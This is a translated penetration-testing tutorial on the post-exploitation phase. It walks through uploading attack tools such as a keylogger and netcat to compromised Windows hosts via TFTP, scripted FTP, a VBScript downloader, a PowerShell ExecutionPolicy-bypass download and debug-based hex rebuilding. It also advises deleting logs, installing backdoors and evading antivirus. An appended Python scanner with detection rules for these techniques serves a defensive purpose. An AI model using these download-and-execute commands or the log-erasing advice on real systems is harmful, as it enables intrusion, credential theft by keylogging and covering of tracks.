Post-penetration testing phase: upload tools
Once the administrator patches the vulnerability, we can no longer control the target host through it, so a post-exploitation phase is needed:
1. Upload a variety of tools
2. Escalate privileges, in order to fully control the target system
3. Erase the attack traces, to prevent the administrator from tracing the source of the attack through the logs (besides the system logs, applications also keep their own logs)
## Delete the system logs and the application logs
For example: in SLMail
4. Install a backdoor program
Achieve long-term control, dump passwords, and use the host as a pivot to infiltrate the intranet (most of the time this is simpler than infiltrating from the public network)
Note: the post-exploitation stage
Biggest challenge: antivirus software (AV detection based on a virus signature database). So we use legitimate remote control software (nc) to try to avoid detection, but it may still be detected after the AV updates its signature database.
Upload tools
Objective: to extend control of the target system into long-term control
Linux systems
Uploading tools to a Linux system is easy, because netcat, curl and wget are installed by default; even if netcat is not installed, curl or wget can download the trojan, netcat and so on from a server the attacker shares. curl and wget are almost always present by default on Linux systems.
Windows systems
By comparison, Windows lacks pre-installed tools, so downloading tools such as trojans is harder.
getshell: example of downloading trojan tools on a Windows system
http://www.freebuf.com/articles/network/100788.html
According to Small White Diary 17, getshell is an nc-style remote control shell, i.e. a non-interactive shell (in the command-line window you must enter a complete command; tab completion is not available).
Differences between an interactive shell and a non-interactive shell: http://kuku789123.blog.163.com/blog/static/1361673512012101513628599/
Installing FTP software on a Windows system through Add/Remove Components (appwiz.cpl) shows the disadvantage of a non-interactive shell: it needs the installation disc to be inserted.
So we have to upload trojan programs that provide an interactive shell (Grey Pigeon, etc.)
Upload tool techniques
1. Transfer files with TFTP (set up a TFTP server, place the tool or trojan on it, then download it from the controlled host over its connection)
XP and 2003 install the TFTP client by default; Win7 and 2008 need it added separately, and it is often filtered by the border firewall. Compared with FTP it is not the mainstream choice, because it uses UDP, transmits in cleartext and supports no authentication.
Using Kali:
mkdir /tftp #create the tftp directory
chown -R nobody /tftp #set the owner to nobody (no local logon rights)
cp /usr/share/windows-binaries/whoami.exe /tftp/ #shows the current user on Windows
cp /usr/share/windows-binaries/klogger.exe /tftp/ #copy the keylogger
atftpd --daemon --port 69 /tftp/ #daemon: start in the background, with the root directory pointing to /tftp
Because of permission issues, a common problem appears (the process that started is not the TFTP service)
Kill that process (PID 543 here) and run chown -R nobody /tftp/ (change the owner to nobody)
Restart the service
Go to the shell window on the target and check TFTP
Transfer the file with TFTP
tasklist #list processes
The keylogger records the administrator's keystrokes and generates a text file in the same directory.
type klogger
2. Transfer using FTP
First, on Kali: apt-get install pure-ftpd
Configure it with the following script (remember the password you set; the echo commands below will use it):
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/ #the ftp home directory created above
/etc/init.d/pure-ftpd restart
Verify the FTP server
Because the shell is non-interactive, the password prompt of an FTP transfer cannot be displayed, so the download has to be approached differently
Idea: write the commands to be executed into a text file on the target server, then have FTP read its commands from that text file
C:\>echo open 192.168.1.127 21 >ftp.txt
C:\>echo yuanfh>>ftp.txt
C:\>echo Password>>ftp.txt
C:\>echo bin>>ftp.txt
C:\>echo get whoami.exe>>ftp.txt
C:\>echo get klogger.exe>>ftp.txt
C:\>echo bye>>ftp.txt
Note the space before > in the first line: in cmd a single digit directly in front of > is treated as a handle number, so "21>ftp.txt" would write "open 192.168.1.127 2" and redirect handle 1. The non-interactive shell echoes each command back, which is why the original listing showed every line twice.
## First copy whoami, klogger and the other programs to the ftphome directory (cp /tftp/* /ftphome/)
ftp -s:ftp.txt
3. Transfer files using VBScript
# VBS is the default interpreted scripting language on Windows; PowerShell was added from Windows 7 onward
## Download the remote control program over HTTP from a web server; apache2 must be started on Kali
root@kali:~# service apache2 start
root@kali:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 4433/apache2
Go to the apache2 default directory and copy the files
root@kali:~# cd /var/www/html
root@kali:/var/www/html# cp /ftphome/* .
root@kali:/var/www/html# ls
index.html klogger.exe
Paste the following commands into the shell window
echo strURL = WScript.Arguments.Item(0) > wget.vbs
echo strFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(strFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 To UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And AscB(MidB(varByteArray, lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://192.168.1.127/whoami.exe w.exe
(cscript ships with Windows; this downloads whoami.exe and saves it as w.exe. After the transfer completes, the target system needs to be restarted.)
4. Use PowerShell on the target to download the program from the server
## Must be run on the Windows system; save the following as wget.ps1
$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://192.168.1.127/whoami.exe"
$file = "new-exploit.exe"
$webclient.DownloadFile($url, $file)
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
5. Transfer files using debug
debug is a 16-bit assembler, disassembler and hex dump tool; used for file transfer it handles only 64 KB of data by default
First, compress the file with UPX, then transfer it
cp /usr/share/windows-binaries/nc.exe . #copy nc to the current directory
root@kali:~# upx -9 nc.exe #-9: maximum compression
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     59392 ->     29184   49.14%    win32/pe     nc.exe

Packed 1 file.
Second, convert the exe program into hexadecimal text format
wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
Copy all the hex code in the text file (except the last two lines) into the shell window
debug<123.hex #generates 1.dll
copy 1.dll nc.exe
Small White Diary 20: Kali penetration testing, post-exploitation phase (1): upload tools
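Seen from the defender's side, all five transfer techniques above leave a characteristic process command line (ftp -s:, cscript with a URL, powershell -ExecutionPolicy Bypass -File, debug with redirected input, tftp GET). The following is an added example, not part of the original post: a small Python scanner that runs one rule per technique over constructed process-creation events; the event format and the sample lines are assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (not from the original post);
# assumed field layout: "<pid> <user> <image path> <command line>".
SAMPLE_EVENTS = [
    r"1204 WEB\iusr C:\Windows\System32\ftp.exe ftp -s:ftp.txt",
    r"1310 WEB\iusr C:\Windows\System32\cscript.exe cscript wget.vbs http://192.0.2.10/whoami.exe w.exe",
    r"1422 WEB\iusr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"1533 WEB\iusr C:\Windows\System32\debug.exe debug<123.hex",
    r"1644 WEB\iusr C:\Windows\System32\tftp.exe tftp -i 192.0.2.10 GET whoami.exe",
    r"1755 WEB\admin C:\Windows\System32\ftp.exe ftp files.example.com",
    r"1866 WEB\admin C:\Windows\System32\cscript.exe cscript logon.vbs",
]

# One regex per transfer technique from the post, matched against the command line only.
RULES = {
    # "ftp -s:ftp.txt": scripted, non-interactive FTP session driven by a command file
    "ftp_scripted": re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I),
    # "cscript wget.vbs http://... w.exe": VBScript fetching a binary over HTTP
    "cscript_url_download": re.compile(r"\bcscript(\.exe)?\b.*\.vbs\b.*https?://", re.I),
    # "powershell -ExecutionPolicy Bypass ... -File wget.ps1": policy bypass plus script file
    "powershell_bypass_file": re.compile(
        r"\bpowershell(\.exe)?\b(?=.*-ex\w*\s+bypass)(?=.*-file\b)", re.I),
    # "debug<123.hex": rebuilding an executable from pasted hex via debug.exe
    "debug_hex_rebuild": re.compile(r"\bdebug(\.exe)?\s*<\s*\S+", re.I),
    # "tftp ... GET <file>": pulling a file from a TFTP server over UDP/69
    "tftp_get": re.compile(r"\btftp(\.exe)?\b.*\bget\b", re.I),
}

def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into its four fields; only the command line may contain spaces."""
    pid, user, image, cmdline = line.split(" ", 3)
    return {"pid": pid, "user": user, "image": image, "cmdline": cmdline}

def classify(cmdline: str) -> Optional[str]:
    """Return the name of the first rule that matches the command line, else None."""
    for name, pattern in RULES.items():
        if pattern.search(cmdline):
            return name
    return None

def scan(events: List[str]) -> List[Dict[str, str]]:
    """Run every event through the rules and return only the hits, with pid/user context."""
    hits = []
    for line in events:
        ev = parse_event(line)
        rule = classify(ev["cmdline"])
        if rule:
            hits.append({"pid": ev["pid"], "user": ev["user"], "rule": rule, "cmdline": ev["cmdline"]})
    return hits
```

The two benign lines (a plain interactive ftp session and a logon script without a URL) produce no hit, which is the false-positive check worth keeping when tuning the patterns against real Sysmon or 4688 data.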